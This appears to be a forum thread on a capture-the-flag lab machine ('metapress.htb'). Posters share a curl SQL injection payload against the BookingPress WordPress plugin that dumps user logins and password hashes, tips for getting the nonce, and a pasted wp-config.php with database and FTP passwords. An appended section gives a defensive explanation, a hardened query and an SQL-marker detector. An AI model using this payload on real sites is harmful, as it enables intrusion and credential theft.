October 29, 2022 at 8:00 PM
How can I upload a reverse shell/web shell?

October 29, 2022 at 8:01 PM
(October 29, 2022, 07:58 PM)vexxxi Wrote:(October 29, 2022, 07:55 PM)elliotal53 Wrote:(October 29, 2022, 07:50 PM)11231123 Wrote:(October 29, 2022, 07:40 PM)elliotal53 Wrote:(October 29, 2022, 07:36 PM)11231123 Wrote:
    Works for me:
How to get the nonce value?

October 29, 2022 at 8:02 PM
Ah ok, sorry: visit the just-created page as an unauthenticated user and extract the "nonce" (view source -> search for "action:'bookingpress_front_get_category_services'").

October 29, 2022 at 8:04 PM
(October 29, 2022, 08:01 PM)elliotal53 Wrote:(October 29, 2022, 07:58 PM)vexxxi Wrote:(October 29, 2022, 07:55 PM)elliotal53 Wrote:(October 29, 2022, 07:50 PM)11231123 Wrote:(October 29, 2022, 07:40 PM)elliotal53 Wrote:
    How did you get it to work? Mind explaining a bit more?
You should just read before asking, friend: the link https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357 tells you what to do step by step. But if you find it difficult, just right-click, Inspect, and look for the word "nonce"; there you will see a number. If you don't know where to inspect, go to the agenda form.

October 29, 2022 at 8:05 PM
Btw, after logging in, this works:

October 29, 2022 at 8:23 PM
(October 29, 2022, 08:16 PM)elliotal53 Wrote:(October 29, 2022, 08:04 PM)chamo20 Wrote:(October 29, 2022, 08:01 PM)elliotal53 Wrote:(October 29, 2022, 07:58 PM)vexxxi Wrote:(October 29, 2022, 07:55 PM)elliotal53 Wrote:
    {"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."}
It will be different for everyone... lol

October 29, 2022 at 8:23 PM
(October 29, 2022, 08:16 PM)elliotal53 Wrote:(October 29, 2022, 08:04 PM)chamo20 Wrote:(October 29, 2022, 08:01 PM)elliotal53 Wrote:(October 29, 2022, 07:58 PM)vexxxi Wrote:(October 29, 2022, 07:55 PM)elliotal53 Wrote:
    {"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."}
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=b8894b6e08&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
Still returns error.

October 29, 2022 at 8:35 PM
(October 29, 2022, 08:23 PM)elliotal53 Wrote:(October 29, 2022, 08:16 PM)elliotal53 Wrote:(October 29, 2022, 08:04 PM)chamo20 Wrote:(October 29, 2022, 08:01 PM)elliotal53 Wrote:(October 29, 2022, 07:58 PM)vexxxi Wrote:
You have to use the proper nonce value. Remove the backslash and newline.

October 29, 2022 at 8:36 PM
[php]
<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

/**#@+
 * Authentication Unique Keys and Salts.
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
define( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );

/**
 * WordPress Database Table prefix.
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
[/php]

October 29, 2022 at 8:37 PM
(October 29, 2022, 08:35 PM)a5bestG00s3 Wrote:(October 29, 2022, 08:23 PM)elliotal53 Wrote:(October 29, 2022, 08:16 PM)elliotal53 Wrote:(October 29, 2022, 08:04 PM)chamo20 Wrote:(October 29, 2022, 08:01 PM)elliotal53 Wrote:
    How to get the nonce value?
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=b8894b6e08&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
{"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."}
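The 8:35 reply attributes the error response to a bad nonce, and that is the only check the request fails: a WordPress nonce is a CSRF token tied to the page that rendered it, and it does nothing about the `total_service` parameter that the posted body turns into SQL. The example below is added here and is not code from the thread or from the BookingPress plugin. It models the flaw in a toy SQLite schema (the query shape, table layout and rows are constructed stand-ins, not the plugin's real query), shows the hardened lookup with type validation and bound parameters, and runs a numeric-parameter check over the request body posted above, which is what a WAF rule or a log review of `admin-ajax.php` bodies would key on.

```python
"""Added example (not from the thread): why a request like the one above is
injectable, and the defender-side checks that stop it. Query shape, table
layout and sample rows are constructed stand-ins, not the plugin's real code."""
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed toy schema standing in for the plugin's service table and wp_users.
SCHEMA = """
CREATE TABLE services (id INTEGER, category_id INTEGER, name TEXT);
CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
INSERT INTO services VALUES (1, 33, 'Consultation'), (2, 33, 'Follow-up'), (3, 34, 'Intake');
INSERT INTO wp_users VALUES ('admin', '$P$CONSTRUCTED-HASH');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, category_id, total_service):
    """Vulnerable pattern (hypothetical query shape): request parameters are pasted
    straight into the SQL text, so a value such as
    '-1) UNION ALL SELECT ... FROM wp_users-- -' closes the parenthesis, appends a
    second SELECT against wp_users and comments out the rest of the statement."""
    sql = ("SELECT id, name FROM services WHERE (category_id = %s AND id <= %s)"
           % (category_id, total_service))
    return conn.execute(sql).fetchall()


def as_plain_int(value):
    """Accept only a bare decimal integer: no sign, whitespace or SQL syntax."""
    if not isinstance(value, str) or not re.fullmatch(r"\d+", value):
        raise ValueError("expected a plain integer, got %r" % (value,))
    return int(value)


def safe_lookup(conn, category_id, total_service):
    """Hardened form: validate the type first, then bind the values as query
    parameters so the database engine never sees them as SQL."""
    cat = as_plain_int(category_id)
    total = as_plain_int(total_service)
    return conn.execute(
        "SELECT id, name FROM services WHERE (category_id = ? AND id <= ?)",
        (cat, total),
    ).fetchall()


# Detection side: parameters that must be numeric, and syntax that never belongs
# in a booking lookup. Meant for reviewing admin-ajax.php POST bodies in a WAF
# rule or a request log; it is not an authorisation decision.
NUMERIC_PARAMS = {"category_id", "total_service"}
SQL_MARKERS = re.compile(r"(?i)\b(union|select|sleep|benchmark)\b|--|/\*")


def suspicious_params(body):
    """Return the parameter names in a form-encoded body that break the numeric
    rule or carry SQL syntax; an empty list means the body looks benign."""
    flagged = set()
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
                flagged.add(name)
            elif SQL_MARKERS.search(value):
                flagged.add(name)
    return sorted(flagged)


# Constructed samples: a normal request and the body posted in the thread.
BENIGN_BODY = ("action=bookingpress_front_get_category_services"
               "&_wpnonce=b8894b6e08&category_id=33&total_service=2")
THREAD_BODY = ("action=bookingpress_front_get_category_services"
               "&_wpnonce=b8894b6e08&category_id=33&total_service=-7502) UNION ALL SELECT "
               "group_concat(user_login),group_concat(user_pass),@@version_compile_os,"
               "1,2,3,4,5,6 from wp_users-- -")

if __name__ == "__main__":
    db = fresh_db()
    injected = "-1) UNION ALL SELECT user_login, user_pass FROM wp_users-- -"
    print("vulnerable, benign input:", vulnerable_lookup(db, "33", "2"))
    print("vulnerable, injected input:", vulnerable_lookup(db, "33", injected))
    try:
        safe_lookup(db, "33", injected)
    except ValueError as err:
        print("hardened form rejected it:", err)
    print("flagged in thread body:", suspicious_params(THREAD_BODY))
    print("flagged in benign body:", suspicious_params(BENIGN_BODY))
```

The validation is deliberately stricter than `int()` (which would accept `" 33"` or `"3_3"`): identifiers and counts in this kind of endpoint are never signed or padded, so anything that is not `\d+` is rejected before the query is built, and the bound parameters are the second line of defence if a future change relaxes that rule.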